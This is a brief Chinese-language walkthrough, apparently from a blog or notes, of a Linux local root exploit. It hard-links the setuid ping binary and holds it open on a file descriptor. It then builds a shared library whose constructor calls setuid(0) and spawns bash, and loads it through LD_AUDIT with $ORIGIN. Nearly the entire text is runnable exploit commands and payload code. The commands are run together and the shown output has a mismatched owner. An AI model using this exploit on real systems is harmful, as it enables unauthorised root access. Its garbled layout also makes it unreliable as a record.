用普通用户boy作为测试对象
[boy@localhost ~]$ mkdir /tmp/exploit[boy@localhost ~]$ ln /bin/ping /tmp/exploit/target #使用ping命令的suid特性创建一个链接[boy@localhost ~]$ exec 3< /tmp/exploit/target #调用命令[boy@localhost ~]$ ls -l /proc/$$/fd/3lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target[boy@localhost ~]$ rm -rf /tmp/exploit/[boy@localhost ~]$ ls -l /proc/$$/fd/3[boy@localhost ~]$ vim payload.c void __attribute__((constructor)) init()//在配置文件加入如下的内容{setuid(0);system("/bin/bash");}
[boy@localhost ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c[boy@localhost ~]$ ls -l /tmp/exploit[boy@localhost ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3